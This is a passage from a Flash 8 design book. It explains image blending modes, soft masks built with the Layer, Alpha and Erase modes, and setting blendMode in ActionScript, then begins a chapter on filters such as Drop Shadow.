[bookmark: 120][bookmark: CH02FIG066E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-6: Affected image when Darken blending mode is applied from sourceMC to destinationMC
[bookmark: 121][bookmark: n5566]
This image looks very similar to the last example
using Darken; however, you should be able to see that some areas have
become darker still as a result of the multiplying effect. Keep in mind
that multiplying a color with black will always result in having black
in the resulting image, while multiplying with white will always leave
the destinationMC colors unchanged.
[bookmark: 122][bookmark: CH02LEV2SEC56E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Lighten Mode
As expected, the Lighten mode will do the exact opposite of the Darken mode. Here, the lighter color of both the sourceMC and destinationMC are chosen. If the sourceMC is lighter than the pixel beneath the destinationMC, this color is transferred to the destinationMC in the resulting image—otherwise it is left unchanged (shown in Figure 2-7).
[bookmark: 123][bookmark: ch02fig076E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: img_27][image: Image from book]
Figure 2-7: Affected image when Lighten blending mode is applied from sourceMC to destinationMC
[bookmark: 124][bookmark: N56286E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
In Figure 2-7 you can clearly see that only the lighter elements from the sourceMC
(in this case, the icing and feather) are displayed over the building.
This type of effect is often used in superimposing text and titles over
images and video, in order to create more fluid and soft-edged type
treatments.
[bookmark: 125][bookmark: ch02lev2sec6]Screen Mode
Just as the Lighten blending mode is the opposite
of the Darken blending mode, so is the Screen mode opposite to the
previously demonstrated Multiply mode. Thus, screening a color with
white will produce white (as black did with Multiply) and screening
with black will leave the color unchanged. Technically, the colors from
both sourceMC and destinationMC
are complemented and then multiplied before the destination image is
replaced with the resulting image. A picture tells a thousand words, so
take a look at the resulting image, shown in Figure 2-8, when Screen mode is applied to the sourceMC.
[bookmark: 126][bookmark: CH02FIG08][bookmark: IMG_28][image: Image from book]
Figure 2-8: An example of an image when Screen blending mode is applied from sourceMC to destinationMC
Although it's similar to the Lighten blending
mode, you can see how the images take on more of an ethereal and soft
look when this blending mode is applied. This is an excellent blending
mode to use when you need to create highlights or apply a lens flare
dynamically to an image.
[bookmark: 127][bookmark: ch02lev2sec7]Overlay Mode
The Overlay blending mode either multiplies or
screens the colors, depending on the destination color you've chosen.
The effect is that the sourceMC will be overlayed over the destinationMC while maintaining all of its highlights and shadows. The resulting composition generally will contain more of the destinationMC image, as shown in Figure 2-9.
[bookmark: 128][bookmark: ch02fig09][image: Image from book]
Figure 2-9: An example of an image when Overlay blending mode is applied from sourceMC to destinationMC
This effect looks similar to having both images on
transparency. The color values will be overlayed and create a blend of
colors between source and destination. However, unlike transparency,
highlights from the source image will remain in the resulting image.
[bookmark: 129][bookmark: n5728]
This mode is often used in digital cartooning and
coloring. Artists will often take the outlined illustration, apply the
coloring on another layer, and use the Overlay mode to create the two
separate layers. It is an interesting way to combine pen-sketch
illustrations and digital coloring techniques.
[bookmark: 130][bookmark: ch02lev2sec8]Hard Light Mode
Hard Light blending mode operates very similarly to the previous Overlay mode, with the exception that color values from sourceMC are used instead of destinationMC for determining whether overlapping pixels are screened or multiplied. For instance, if the sourceMC color is lighter than 0.5, the destinationMC is lightened through screening. If the sourceMC color is darker than 0.5 than the destinationMC is darkened through multiplying. Subsequently using pure black or pure white will maintain color values as shown in Figure 2-10.
[bookmark: 131][bookmark: ch02fig10][image: Image from book]
Figure 2-10: Example of image when Hard Light blending mode is applied from sourceMC to destinationMC
[bookmark: 132][bookmark: n57866E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Just as Overlay generally maintained more of the destinationMC image, you can see from Figure 2-10 that the sourceMC becomes more prevalent when you're using the Hard Light blending mode.
[bookmark: 133][bookmark: ch02lev2sec96E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Add Mode
The Add blending mode adds the sourceMC to the destinationMC
color values to create the resulting image. The general result is a
soft, bright image, which can be useful when creating dissolves between
images as well as for accomplishing lighting type effects (see Figure 2-11).
[bookmark: 134][bookmark: CH02FIG116E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-11: Affected image when Add blending mode is applied from sourceMC to destinationMC
[bookmark: 135][bookmark: CH02LEV2SEC10]Subtract Mode
With the Subtract blending mode, the reverse of the Add blending mode is calculated and the sourceMC is subtracted to the destinationMC. This blending mode can be used for shadow-type effects, as shown in Figure 2-12.
[bookmark: 136][bookmark: CH02FIG126E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-12: Affected image when Subtract blending mode is applied from sourceMC to destinationMC
[bookmark: 137][bookmark: n58766E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 138][bookmark: CH02LEV2SEC11]Difference Mode
This unique blending mode often creates
surprising results. The Difference blending mode operates by
determining the darker of the two colors in sourceMC and destinationMC
and then subtracting the darker of the two from the lighter one. This
way, white will always invert the destination color and black in the sourceMC will create no change. Generally this effect will create the vibrant saturated colors shown in Figure 2-13.
[bookmark: 139][bookmark: CH02FIG136E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-13: An example of an image when Difference blending mode is applied from sourceMC to destinationMC
[bookmark: 140][bookmark: CH02LEV2SEC12]Invert Mode
Invert mode is a common image manipulation in many graphic applications and involves inverting the colors of the destinationMC image. However, you can't apply this blending mode to a single destinationMC. Here, the sourceMC is used merely to represent the area of the destinationMC that you wish to invert. Similar to a mask, only the overlapping areas will invert the destinationMC (see Figure 2-14).
[bookmark: 141][bookmark: ch02fig14][image: Image from book]
Figure 2-14: An example of an image when Invert blending mode is applied from sourceMC to destinationMC
[bookmark: 142][bookmark: N5967]
It's important to know that this blending mode is affected differently with regards to the alpha of the sourceMC. The strength of the sourceMC determines the level of invert on the destinationMC. Applying an alpha level of 100 to the sourceMC creates a full invert; however if you try adjusting the alpha of the sourceMC
to 50% you will notice that the entire image goes grey, and that
reducing it further will reduce the invert to 0%, which will create no
invert whatsoever. This is a significant difference from the use of the
mask and you should be aware of this if you plan to animate MovieClips
with alpha while using an invert blending mode.
Now that you are familiar with what will
ultimately be the most familiar blending modes available in Flash 8,
it's time to take a look at several more blending modes, all of which
operate a little differently than the modes covered so far. To access
the Alpha, Erase, and Layer blending modes we need to create a
Composition clip to properly achieve the blending effects.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch026E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 143][bookmark: ch02lev1sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Applying Layer, Alpha, and Erase Blending Modes
With the addition of these new blending modes
comes a special set of operations that have been long awaited. For
years, creating a soft mask in Flash has been no easy task. Creating
mask layers with alpha has never produced the soft-faded mask that you
might have expected—instead it has always assumed the shape of the
object and not the alpha information it contains. However, many wishes
have been fulfilled with the addition of the new Layer blending mode,
which finally allows you to create soft-feathered masks using alpha
gradients.
Using the Layer blending mode, however, involves a few
more steps than the blending modes covered so far, but the payoff is
well worth it. So, let's get on with it.
[bookmark: 144][bookmark: ch02lev2sec136E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Layer Blending Mode
As mentioned, using the Layer blending mode
requires some additional steps to generate the desired effects, and
uses both Alpha and Erase blending modes. These sets of blending modes
can work in conjunction, but they require the creation of an additional
MovieClip for compositing the final result.
The reason this extra composition movie clip is
required is because unlike an imaging application that uses a layer
hierarchy, such as Fireworks or Photoshop, Flash uses an entirely
different hierarchical structure for managing elements and objects on
the stage. For this reason, the use of Alpha and Erase require that an
additional parent movie clip is set to the Layer blending mode. Flash
treats this movie clip as a new canvas where embedded blending modes
are calculated and then parent clips are redrawn using normal mode.
This process is necessary because Flash can't modify the opacity of the
main or root timeline and both of these blending modes use opacity and
thus alpha modifiers.
But enough with the technical explanations—no doubt you are anxious to see how easily we can create soft masks!
[bookmark: 145][bookmark: N60296E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 146][bookmark: ch02lev2sec146E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Alpha Mode: Creating Soft Masks
The purpose of the Alpha blending mode is to
utilize the alpha information of the applied movie clip inside the
composition Layer movie clip in displaying the destinationMC image. Any area in the movie clip that is transparent (using alpha values) will cause the same area in the destinationMC to be transparent, allowing the sourceMC
image to show through. This may seem confusing at first, so let's take
a look at the following example which clearly illustrates the proper
structure required to use the Alpha blending mode. When completed, you
will have a feathered circle mask displaying the destinationMC through the sourceMC.
Start by opening BlendingModes.fla,
which is the file you used in the previous examples. You will be
modifying this file yourself, in order to familiarize yourself with the
concept of using Layer and Alpha blending modes. If you want to jump
right ahead and see the finished product, you can take a look at the AlphaBlending.fla which is the completed file created by following the steps below.
Creating a composition movie clip using the Layer blending mode[bookmark: 147][bookmark: N60706E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[image: Image from book]
The first thing that you need to do is modify the existing sourceMC blend and transform it into a precomposition movie clip.
Select sourceMC, which is located on the top layer (you may want to lock the destinationMC layer, as you won't need to modify it in this example) and change the blending mode to Layer using the Blend drop-down menu on the Property Inspector.
[bookmark: 148][bookmark: ch02fig156E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-15: Setting the parent composition movie clip to the Layer blending mode
[bookmark: 149][bookmark: N61236E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
You'll notice that it appears the same as it would in the Normal blending mode. Your sourceMC image is the only thing visible blocking out the destinationMC image that lies beneath it.
With sourceMC set to
the Layer blending mode, double-click on sourceMC to enter "Edit in
Place" mode, and add a new layer on top and label it sourceMask.
[bookmark: 150][bookmark: ch02fig166E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-16: Creating a layer for Alpha blending mode to be applied to sourceMC Timeline
The sourceMask layer is the layer that will contain the masking movie clip you will create next.
With the sourceMask layer selected, draw a circle on the stage. Look for the Color Mixer palette. If you can't find it, open the Color Mixer palette using Shift+F9 and you'll find it at the right side of the screen. With the newly drawn circle selected, use the Color Mixer palette and set the fill to Radial.
[bookmark: 151][bookmark: ch02fig176E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-17: Creating Alpha gradient to be used with Alpha blending mode
Since the goal is to create a soft feathered
mask, you need to adjust the inner gradient alpha value and set it to
0. By doing this, the gBradient fades from full opacity on the outside
to a transparent center region. Select the left gradient color and
modify its alpha setting to 0.
[bookmark: 152][bookmark: IDX-336E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 153][bookmark: ch02fig186E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-18: Setting inner gradient alpha level to 0% for displaying destinationMC
Your new gradient circle should now have an alpha fade and provide a preview of the final effect.
[bookmark: 154][bookmark: ch02fig196E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-19: Preview of feathered mask region inside the sourceMC
However, this preview of the alpha mask is currently over your sourceMC image, which is not what we want. Remember, the object is to mask the destinationMC image through this newly created mask. The next steps are crucial for achieving this.
[bookmark: 155][bookmark: N62906E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Since blending modes can only be applied to movie
clips you must now select your newly created alpha gradient circle and
turn it into a movie clip. Once selected choose Modify ➤ Convert to Symbol (F8) and give it the name sourceMask.
To utilize this alpha information, you must now
select your newly created sourceMask movie clip and change its blending
mode to Alpha in the Property Inspector. Once you have done this,
you'll notice that sourceMask is now invisible on the stage, with only its bounding box showing.
[bookmark: 156][bookmark: ch02fig206E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-20: How the sourceMask appears inside sourceMC when set to Alpha blending mode
Fear not! Although the destinationMC clip appears invisible inside of the sourceMC movie clip, if you return back to the main Timeline by selecting the Scene1 link, you'll see that the same destinationMC clip is now being displayed through the alpha gradient clip that you created.
[bookmark: 157][bookmark: ch02fig216E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-21: Final completed Alpha blend effect when previewed on main Timeline
It's as easy at that! This is just the beginning of the
interesting and creative things that can be done with this fabulous new
blending mode. For instance, with this file, try creating [bookmark: 158][bookmark: N63816E565C1E-70B7-44D0-82B7-BC4CDC351AB9]different sourceMask clips containing different shapes, sizes, and alpha gradients. Experiment! Explore!
Another beautiful aspect of utilizing the Alpha blending mode is that you can animate them as well. For instance, in your sourceMC
Timeline, try animating your newly created sourceMask clip. Try scaling
or moving it and note how the alpha information is transferred to the destinationMC
when you test your movie. With luck, this will be the beginning of a
whole new world of creative possibilities for your Flash projects.
[image: Image from book]
[bookmark: 159][bookmark: ch02lev2sec156E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Erase Mode
With the Erase blending mode, you use the same
process that you used with the Alpha mode—which, as you'll remember,
requires the creation of a parent composition MovieClip set to a Layer
blending mode.
The generated effect, however, is the opposite of what
was seen with the Alpha blending mode. When you use Erase, the opaque
areas of the alpha gradient remove areas of the destinationMC. Areas with low alpha will allow the destinationMC to be seen through the sourceMC. You can see this opposite effect in the following image.
[bookmark: 160][bookmark: ch02fig226E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-22: Final completed Erase blend effect when previewed on main Timeline
Although the blending modes demonstrated so far in
this chapter have been done manually in the Flash IDE, blending modes
are also available as a MovieClip property and can be accessed via ActionScript—and it couldn't be easier!
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch026E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 161][bookmark: ch02lev1sec56E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Applying Blends Using ActionScript
In Flash 8, the ability to access blending modes
has been extended beyond the IDE and is now accessible through
ActionScript. You can now modify a movie clip's blending mode by
altering the new blendMode property. Macromedia defines this new property by saying [bookmark: 162][bookmark: N64626E565C1E-70B7-44D0-82B7-BC4CDC351AB9]that blendMode
is "The blending mode for this movie clip. The blending mode affects
the appearance of the movie clip when it is in a layer above another
object on-screen."
Reopen the BlendingModes.fla, if you don't still have it open.
Create a new layer and label it Actions
On frame 1, create a frame action with the following code:
sourceMC.blendMode = "darken";
If you test this movie now, you will see that this code
will override whatever existing blending mode was set manually in the
Property Inspector. The blendMode property accepts both strings
and numbers (1–14) as values, so if you are using a string, ensure that
you have it within quotations. For instance for the Multiply blend you
can either use:
sourceMC.blendMode = "multiply";
sourceMC.blendMode = 3;
If you'd like to be able to see how all the blending modes look quickly, open up the BlendingModesAS.fla file. This file is the same as BlendingModes.fla with the addition of a ComboBox component which dynamically will change the blending mode of the sourceMC movie clip when a new selection is made from the ComboBox.
[bookmark: 163][bookmark: ch02fig236E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-23: BlendingModeAS.fla, ready to go.
[bookmark: 164][bookmark: IDX-376E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
The additional code used to perform this is also very simple as you can see:
modeChangeListener = new Object(); // Create the listener object
// define the 'change' event
modeChangeListener.change = function(evtObj)
{
// Set the blendMode to the value of the label
//of the selected item in the blend_cb comboBox
sourceMC.blendMode = evtObj.target.selectedItem.label;
}
// Assign the change event to blend_cb
blend_cb.addEventListener("change", modeChangeListener);
The ComboBox component is merely passing on the label which is a string to the blendMode property in the function called when a selection is made in the ComboBox.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch026E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 165][bookmark: ch02lev1sec66E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Summary
And so concludes today's lesson on the incredible
and amazing blending modes now supported in Flash 8. However, this is
just the tip of the iceberg, with regards to the new visual
enhancements available within Flash 8, as you'll soon see. In the next chapter you will discover the wonderful new world of Flash filters.
[bookmark: 166][bookmark: ch02table016E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Table 2-1: The summary of the different blending modes
blendMode
Result of sourcePixel and destPixel
Normal
sourcePixel
Darken
if (sourcePixel < destPixel)
sourcePixel
else
destPixel
Multiply
sourcePixel x destPixel
Lighten
if (sourcePixel > destPixel)
sourcePixel
else
destPixel
Screen
1 - (1-sourcePixel) x (1-destPixel)
Overlay
if (sourcePixel < 0.5)
Multiply sourcePixel with destPixel
Else
Screen sourcePixel with destPixel[bookmark: 167][bookmark: IDX-386E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Hard Light
if (destPixel < 0.5)
Multiply sourcePixel with destPixel
Else
Screen sourcePixel with destPixel
Add
sourcePixel + destPixel
Subtract
(sourcePixel + destPixel) – 1
Difference
| sourcePixel – destPixel |
Invert
1 – destPixel
Note that, in all cases, the math is performed on the
red, green, and blue component values separately, to create final pixel
red, green, and blue components. So, Multiply actually does the
following:
newRed = sourceRed x destRed
newGreen = sourceGreen x destGreen
newBlue = sourceBlue x destBlue
final pixel is newRed, newGreen, newBlue
Though values are represented as a number from 0 to 255
digitally, they are actually treated as if they are in the range of 0
to 1 when the blend operations take place. This way, multiplying 128 ×
128, which would normally be 16,384, would actually be treated as 0.5 ×
0.5, which would result in 0.25, and then digitally that would be 64.
In some cases, for example with Add and Subtract,
where a resulting value is greater than 1 (255) or less than 0, then
the value is simply clamped and set to 255 or 0.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch036E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Chapter 3: Filters
[bookmark: 169][bookmark: IDX-396E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
by Glenn Rhodes and Craig Swann
[bookmark: 170][bookmark: N69566E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
As you have seen in the previous chapter
there are plenty of new creative ways to work with visual assets in
Flash 8. However, blending modes is just the beginning! As you will see
in this chapter, there are some very powerful new possibilities to be
discovered through the use of the new Filters that are available.
More than likely, if you have ever worked with image
assets in Fireworks or Photoshop you are familiar with filters. In
these imaging applications, filters such as Blur, Glow and Bevel are
common (if not overused). These same filters, as well as many more, can
now be harnessed directly inside of Flash 8. Although at times it may
be better to treat images and text in an imaging application first, in
order to save on processing power, the ability to use filters inside of
the Flash environment is an indispensable way to create quick, easy,
and often powerful visual effects.
As with the previously covered blending modes, filters
can be accessed and manipulated through both the Flash 8 IDE as well as
directly through ActionScript. The big difference between filters and
blends is that filters can be animated! This opens up even more options
for both the designer and developer using Flash. Let's first take a
look at the filters that are now available in Flash 8.
Remember that you can download all the code examples featured in this chapter from.
[bookmark: 171][bookmark: ch03lev1sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Filters Available in Flash IDE
The following filters are available in Flash IDE:
Drop Shadow: Places a black shadow beneath an object giving it the appearance of "floating" above the stage.
Blur: Defocuses an object, giving it the appearance of looking through smudged glass, or a poorly focused lens.
Glow: Creates a slight glowing outline around an object, following the contours and curves of the object perfectly.
Bevel: Creates a shadow and a highlight on opposite edges of an
object, giving the illusion that it is 3D. Bevel is very common, and
most user interface buttons in regular applications have a Bevel filter.
Gradient Glow: Similar to the Glow filter, except the glow itself may follow a gradient of color from the inner to the outer edge.
Gradient Bevel: Similar to the Bevel filter, except you can specify a gradient color on the shadow and highlights of the beveled edges.
Adjust Color: Allows you to adjust the brightness, hue, and saturation of an object.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch036E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 172][bookmark: ch03lev1sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]ActionScript Filters
[bookmark: 173][bookmark: N70516E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
The following filters are available in Actionscript:
Color Matrix: Allows you to perform several color tricks,
including all those accessible in the previously mentioned Adjust Color
filter, as well as effects similar to the setTransform method of the Color object.
Displacement Map: Allows you to move pixels by a certain amount,
both horizontally and vertically, and independent of each other.
Creates popular effects like warp, bend, water ripples, and more.
Convolution: A filter that allows you to perform various effects
by performing adjustments to pixels, based on the color of their
adjacent pixels.
As you can see, there is a lot to play with. You will
also notice that the previous list is broken down to include filters
specific to ActionScript. Convolution, Color Matrix and Displacement
Map are very powerful and complex filters, which are available only
through the use of ActionScript. Keep in mind though, that while all
filters can be accessed directly through ActionScript, the Convolution,
Color Matrix, and Displacement Map filters can only
be used in conjunction with ActionScript. Don't fret—as complex as this
may sound, the examples later in this chapter will give you the
knowledge necessary to begin using these filters—even if you are not a
hardcore ActionScript developer.
This chapter will cover both methods of applying
filters, but let's start with the most direct way of adding filters to
your Flash projects—through the Flash 8 IDE.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: CH03]
[bookmark: 174][bookmark: CH03LEV1SEC3]Applying Filters Using the Flash 8 IDE
Unlike blending modes there is a little more
flexibility when using filters. You can apply a filter to either a
movie clip, button, or TextField (whether static or dynamic). Filters
are available in the Flash Authoring Environment in the Property
Inspector. A new tab has been added to this Inspector called Filters,
as seen in Figure 3-1,
which is where you will find the filters that are accessible through
the IDE. Let's dive right in and start exploring how easy it is to
apply Filters.
[bookmark: 175][bookmark: ch03fig01][bookmark: img_44][image: Image from book]
Figure 3-1: New Filters tab in the Property Inspector for applying filters to text, movie clips, and buttons
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch036E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 176][bookmark: ch03lev1sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Drop Shadow
[bookmark: 177][bookmark: N71536E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Creating soft drop shadows in previous versions of
Flash was not always possible. Generally you could create alpha
gradients and use the Soften Fill Edges (Modify ➤ Shape ➤ Soften Fill Edges…)
to create a simulated effect, or create them using Photoshop, then
import them. However, this was often not very useful because you could
never use this with dynamic movie clips or Dynamic Text, which might
change shape or size. The ability to use the now-available Drop Shadow
filter makes it a snap to instantly add a realistic drop shadow to any
existing object on stage, whether it's text, movie clip or button. If
you're interested, take a look at to see how you used to have to add drop shadows in Flash. It wasn't pretty, and it wasn't fun.
Let's start off by adding a drop shadow to dynamic text.
[bookmark: 178][bookmark: ch03lev2sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Adding a Drop Shadow to Dynamic Text
For this example, you will add a Drop Shadow to some Dynamic Text. As you'll soon see, there's nothing to it!
With a new Document open complete the following steps:
Select the Text tool, click it on stage and type "Flash 8 Rocks!" (OK, OK, feel free to type in whatever you like, if you feel so inclined, but Flash 8 does rock.)
With the text selected, open the Property Inspector, and make sure to select Dynamic Text for the type of text and give it the instance name dynamicText. You'll need this a little later, and it should look something like the following:
Now Select the text field on stage and in the Property Inspector click the all-new- for-Flash-8 Filters tab.
[bookmark: 179][bookmark: N72526E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
You will notice there is an option to add new filters using the Add Filter (+ button).
Click the Add Filter (+ button) in the Filters tab and then, from the drop-down menu, select the Drop Shadow option.
You will notice as soon as you do this that the text
will instantly take on some default properties and that you are
provided with the full Drop Shadow properties, available to be modified
to your every whim. Our dynamic text now looks like the image below
with the properties visible in the Property Inspector.
[bookmark: 180][bookmark: N72736E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Now that you have created your first Drop Shadow
example, let's take a look at the properties in more depth so you can
begin experimenting.
[bookmark: 181][bookmark: ch03fig026E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-2: Creating Dynamic Text with instance name dynamicText
[bookmark: 182][bookmark: ch03fig036E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-3: New Filters tab in the Property Inspector for adding filters.
[bookmark: 183][bookmark: ch03fig046E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-4: New filters available through the Filters tab in theProperty Inspector.
[bookmark: 184][bookmark: ch03fig056E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-5: Adding a Drop Shadow through the Filters tab in the Property Inspector.
[bookmark: 185][bookmark: ch03lev2sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Drop Shadow Properties
The following modifiable properties exist within the Drop Shadow filter.
[bookmark: 186][bookmark: ch03lev3sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Blur X and Blur Y
Blur X and Blur Y
affect the amount of the blur that the drop shadow receives. By
default, these are set to be constrained using the small lock icon next
to the property input fields. Quite often this generates the most
realistic drop shadow effect, however you can also unlock the
constraints by clicking the lock icon and set individual values (0-100)
for both the X and Y Blur values. Don't forget that this property, like
all others, can be animated on the Timeline to create lighting effects
(see Figures 3-6 and 3-7).
[bookmark: 187][bookmark: ch03fig066E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-6: Drop Shadow with Default Blur values of Blur X = 5 and Blur Y = 5.
[bookmark: 188][bookmark: ch03fig076E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-7: Drop Shadow with Modified Blur values of Blur X = 5 and Blur Y = 20
[bookmark: 189][bookmark: ch03lev3sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Color
The Color property
works just as the other Color palette options in the Flash environment
do. This property sets the color to be used for the drop shadow. You'll
also notice that this Color property
includes an alpha value, which can be used to create softer drop
shadows when the alpha value approaches 0. You can see some examples in
Figures 3-8 and 3-9.
[bookmark: 190][bookmark: ch03fig086E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-8: Drop Shadow with Default Color Selection
[bookmark: 191][bookmark: ch03fig096E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-9: Drop Shadow with Color settings modified to a hex value of #FF9999 and an alpha value of 50%
[bookmark: 192][bookmark: N74766E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 193][bookmark: ch03lev3sec36E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Strength
The Strength property
represents the filter strength being used, and creates effects very
similar to those created when you change the alpha value in the Color
property. This property will accept values between 0-1000%. Generally
values between 0-100% will suffice, but there may be times when you can
generate interesting results by using the upper regions of the
property. Like all new things in Flash 8, it's best if you experiment
and see how these different properties work for you in your own Flash
projects, as shown in Figures 3-10 and 3-11.
[bookmark: 194][bookmark: ch03fig106E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-10: Drop Shadow with Default Settings of Strength = 100%
[bookmark: 195][bookmark: ch03fig116E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-11: Drop Shadow with Modified Settings of Strength = 1000%
[bookmark: 196][bookmark: ch03lev3sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Angle
The Angle property
does just what you think it does, which is set the angle (0-360) that
the light source is coming from. By modifying the Angle,
you can adjust the direction and ultimate position of the drop shadow
which is generated. As this property can also be animated on the
timeline (or in ActionScript as you will see later) you can use this to
create the illusion of a moving light source. See Figures 3-12 and 3-13 for more details.
[bookmark: 197][bookmark: ch03fig126E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-12: Drop Shadow with Default Angle setting of 45
[bookmark: 198][bookmark: ch03fig136E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-13: Drop Shadow with Modified Angle setting of 315
[bookmark: 199][bookmark: ch03lev3sec56E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Distance
The Distance property works in conjunction with the Angle property. Based on the angle of the light source used to create the drop shadow, the Distance
value (-32 – +32) sets how far the drop shadow should be placed from
the object being applied with it. Negative values will move the drop
shadow closer to the calculated light source and [bookmark: 200][bookmark: N76226E565C1E-70B7-44D0-82B7-BC4CDC351AB9]positive values will move the drop shadow further away. As it's another property that can be animated, Distance,
in conjunction with other changing property values, can greatly enhance
the realistic illusion of light sources moving. You'll see what we mean
in Figures 3-14 and 3-15.
[bookmark: 201][bookmark: ch03fig146E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-14: Drop Shadow with default Distance setting of 5
[bookmark: 202][bookmark: ch03fig156E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-15: Drop Shadow with default Distance setting of 15
[bookmark: 203][bookmark: ch03lev3sec66E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Quality
Quality is used to apply the quality level
of the drop shadow. If you try toggling this value, you will see that
there are subtle differences in the quality of the visual
representation. Be aware, however, that using a Quality setting of High
will require more processing power to apply. When animating or using
motion on objects that have filters applied to them, it is best to keep
the Quality setting to Low. You'll find that at this setting, you can still create quality effects.
[bookmark: 204][bookmark: ch03lev3sec76E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Knockout
Knockout is a property that can be toggled on and off and is used to knock out the source image. Take a look at Figures 3-16 and 3-17 to see the difference that is made when this property is turned on and off.
